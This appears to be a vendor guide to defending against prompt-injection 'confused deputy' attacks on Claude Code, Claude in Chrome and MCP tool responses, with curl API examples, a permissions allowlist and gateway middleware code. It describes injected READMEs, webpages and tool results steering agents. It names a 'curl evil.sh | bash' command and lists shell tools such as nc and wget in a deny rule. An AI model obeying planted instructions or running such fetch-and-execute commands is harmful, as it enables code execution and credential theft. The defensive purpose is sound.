Claude confused-deputy audit matrix: 4 blind spots, 3 guardrails
Between May 6 and 7, 2026, four separate research teams published findings about Claude prompt injection. Most coverage treated them as three different stories. They are the same story: a confused deputy problem where Claude executes actions on behalf of an attacker who controls untrusted content in its context window.
A README in a cloned repo can run shell commands through Claude Code. A webpage in Claude in Chrome can convince the agent to fetch attacker URLs. An MCP tool response can inject instructions that the next tool call obeys. The model is doing what it was told; the problem is the model cannot tell who is doing the telling.
Anthropic ships partial defenses (permission prompts in Claude Code, action confirmations in Claude in Chrome). The rest is yours. Here is the audit matrix that maps each blind spot to a concrete guardrail and a one-call API check you can drop into your MCP gateway today.
The four blind spots
| Surface | Attack vector | What runs | Native guardrail |
|---|---|---|---|
| Claude Code | Poisoned README, package postinstall, or git commit body | Shell command, file write, git push | Permission prompt |
| Claude in Chrome | Webpage instructions disguised as user requests | Click, form submit, link follow | Action confirmation |
| Claude Desktop + MCP | Tool response carries instructions for the next call | Chained MCP tool call, file read, network fetch | Tool consent dialog |
API tool_use | Untrusted string inside a tool result block | Whatever the next turn decides | None by default |
Each native guardrail catches the obvious case (a shell command the user did not ask for) and misses the subtle one (a "harmless" curl to a lookalike host the user has never seen). The fix is defense in depth at the tool layer, not at the prompt layer.
Guardrail 1: phishing-check every URL the agent touches
The most common confused-deputy escalation is "visit this URL and tell me what it says." The URL belongs to the attacker. The data the agent reads next is now their input. Run a phishing check on every URL the agent did not see in the original user prompt:
curl -X POST https://api.botoi.com/v1/phishing/check \
-H "Content-Type: application/json" \
-d '{"url": "https://gist.githubusercontent.com/anon/raw/setup.sh"}' {
"data": {
"url": "https://gist.githubusercontent.com/anon/raw/setup.sh",
"verdict": "suspicious",
"score": 0.71,
"signals": [
"raw_executable_content",
"anonymous_gist_account",
"no_pinned_commit"
]
}
}
A raw executable hosted on an anonymous gist with no pinned commit is a classic
prompt-injection-to-shell-execution chain. The verdict comes back in under 100 ms; you cache by
URL hash for 10 minutes; you drop tool calls whose verdict is anything other than
clean.
Guardrail 2: PII and secret scan on every MCP tool response
The second escalation is tool response poisoning. An MCP tool returns a 4 KB JSON blob; somewhere in that blob is an instruction string. Claude reads the whole blob and the instruction wins. The blob can also leak credentials harvested elsewhere, which then end up in the model's reasoning trace and your conversation logs.
curl -X POST https://api.botoi.com/v1/pii/detect \
-H "Content-Type: application/json" \
-d '{"text": "MCP tool response: user_email=jane@acme.com, AWS_SECRET=wJalr..."}' {
"data": {
"found": true,
"matches": [
{ "type": "email", "value": "jane@acme.com" },
{ "type": "aws_secret_key", "value": "wJalr..." }
]
}
} Block the tool response from reaching the model if it carries live credentials. Redact emails and phones unless the user asked for them. Treat every MCP server as untrusted by default; you do not know who poisoned the upstream data source.
Guardrail 3: hard host and shell allowlists at the gateway
The third escalation is the one that bites enterprises: an agent that quietly broadens its own
reach. A README convinces Claude Code to run curl evil.sh | bash "for setup." A
webpage convinces Claude in Chrome to submit a form on a lookalike domain. Both attacks die
against a fixed allowlist:
# Claude Code: pin shell commands to a known allowlist
cat > ~/.claude/permissions.json <<'EOF'
{
"shell": {
"allow": ["git status", "git diff", "npm test", "pnpm test", "pnpm build"],
"deny": ["curl", "wget", "nc", "bash -c", "eval"]
},
"network": {
"allow_hosts": ["api.botoi.com", "api.github.com", "registry.npmjs.org"]
}
}
EOF
# Claude in Chrome: extension-level host allowlist via enterprise policy
defaults write com.anthropic.claude.chrome \
AllowedHosts -array \
"https://*.acme-corp.com" \
"https://api.botoi.com" \
"https://docs.anthropic.com" The allowlist is boring. Boring is the point. Every action that escapes the allowlist either fails immediately or surfaces a prompt the user has to read. The agent stays useful inside the sandbox and harmless outside it.
The 60-line MCP gateway that wires it together
All three guardrails live in one middleware function that sits between Claude and every MCP server. It pulls URLs out of tool responses, checks them against a trusted host set plus a session allowlist, runs a PII scan, and returns a structured block decision the host application can surface to the user:
// MCP gateway middleware. Sits between Claude and every MCP server.
// Runs four checks on each tool response before forwarding to the model.
import { LRUCache } from "lru-cache";
const trustedHosts = new Set(["api.botoi.com", "api.github.com", "api.stripe.com"]);
const urlCache = new LRUCache({ max: 500, ttl: 1000 * 60 * 10 });
export async function inspect(toolResponse, sessionAllowlist) {
// 1. Pull every URL out of the response payload
const urls = [...JSON.stringify(toolResponse).matchAll(/https?:\/\/[^\s"'<>]+/g)]
.map((m) => m[0]);
for (const url of urls) {
const host = new URL(url).hostname;
if (trustedHosts.has(host) || sessionAllowlist.has(host)) continue;
const cached = urlCache.get(url);
const verdict = cached ?? (await checkUrl(url));
urlCache.set(url, verdict);
if (verdict.verdict !== "clean") {
return { block: true, reason: `untrusted url: ${url} (${verdict.verdict})` };
}
}
// 2. Scan for PII and leaked secrets in the response itself
const pii = await fetch("https://api.botoi.com/v1/pii/detect", {
method: "POST",
headers: { "Content-Type": "application/json", "X-API-Key": process.env.BOTOI_API_KEY },
body: JSON.stringify({ text: JSON.stringify(toolResponse).slice(0, 8000) }),
}).then((r) => r.json());
if (pii.data?.matches?.some((m) => m.type === "aws_secret_key" || m.type === "npm_token")) {
return { block: true, reason: "tool response contains live credentials" };
}
return { block: false };
}
async function checkUrl(url) {
const r = await fetch("https://api.botoi.com/v1/phishing/check", {
method: "POST",
headers: { "Content-Type": "application/json", "X-API-Key": process.env.BOTOI_API_KEY },
body: JSON.stringify({ url }),
});
return (await r.json()).data;
} The trusted host set holds your own APIs. The session allowlist starts empty and grows as the user explicitly approves hosts during the session. Caching keeps the check effectively free for repeat URLs (think pagination, retries, the same docs page across tool calls).
If you cannot run a gateway yet, do the cheap version: log every URL and every shell command the agent proposes to a structured store, and alert on anything that hits a host you did not preauthorize. Detection without prevention beats neither.
Where this fits in a defense-in-depth posture
The audit matrix is not a replacement for Anthropic's own work. It is the layer you control. A sensible split:
- Anthropic owns the model: prompt-injection robustness, instruction-hierarchy training, refusal behavior.
- You own the tool surface: URL validation, PII scrubbing, host and shell allowlists, MCP server inventory.
- Your IdP owns the identity: short-lived tokens for the agent, per-session audit, separate credentials from the human user.
Skip any layer and the next confused-deputy report includes your incident. The May 6-7 research is a free preview of what every team needs to ship before this becomes a quarterly news cycle.
Key takeaways
- Four blind spots, one root cause. Claude treats every token as potentially instruction-bearing. Untrusted content in context is an action vector, not a passive read.
- URL phishing check on every tool-proposed URL. One API call, 100 ms, cached. Drops the most common prompt-injection escalation chain.
- PII scan on every MCP tool response. Blocks credential exfiltration through tool result poisoning and keeps secrets out of conversation logs.
- Hard allowlists at the gateway. Shell command and host allowlists kill the "quietly broaden reach" escalation. Boring, finite, effective.
- Defense-in-depth split. Anthropic owns the model, you own the tool surface, your IdP owns identity. Skip a layer and the next research drop names you.
Botoi exposes /v1/phishing/check, /v1/pii/detect,
/v1/url-metadata, and roughly 200 more single-purpose endpoints behind one API key
with 5 req/min free. Wire them into your MCP gateway or call them from Claude Code itself via
the botoi MCP server.
Browse the
interactive docs
to start.
Frequently asked questions
- What is the Claude confused-deputy issue?
- A confused deputy attack happens when a privileged process (Claude Code, Claude in Chrome) executes actions on behalf of an attacker who controls part of its input. Between May 6 and 7, 2026, four research teams published findings showing Claude can be tricked into running shell commands, exfiltrating data, or visiting attacker URLs when untrusted content (a README, a webpage, an MCP tool response) carries instructions that look like user requests.
- Which Claude surfaces are affected?
- Claude Code (CLI agent reading repo files), Claude in Chrome (browsing agent reading webpages), Claude Desktop with MCP servers (tool responses can carry instructions), and the API when tool_use results contain attacker-controlled strings. The root issue is the same in all four: Claude treats every token in context as potentially instruction-bearing.
- Does Anthropic ship guardrails for this?
- Yes, partially. Claude Code has a permission system for shell and file writes. Claude in Chrome has an action confirmation layer. Neither stops a determined attacker from chaining prompt injection with social engineering. The defense-in-depth layer is yours: validate every URL the agent proposes, scan every tool response for IOCs, and cap blast radius at the API gateway.
- How is this different from a regular prompt injection?
- Classic prompt injection ends at output text. Confused deputy ends at action: a shell command runs, a URL is fetched, a webhook fires, money moves. The fix has to live where actions happen (the tool layer), not where text is generated (the model). That is why guardrail proxies and URL validation matter more than prompt hardening.
- What is the minimum I should add this week?
- Three things. A URL phishing check before the agent fetches or links to any domain it did not see in the user prompt. A PII and secret scan on every MCP tool response before it enters Claude's context. And a hard allowlist of shell commands or HTTP hosts at the gateway layer. Each is one API call and one config block.
Try this API
Phishing Check API — interactive playground and code examples
More guide posts
Start building with botoi
150+ API endpoints for lookup, text processing, image generation, and developer utilities. Free tier, no credit card.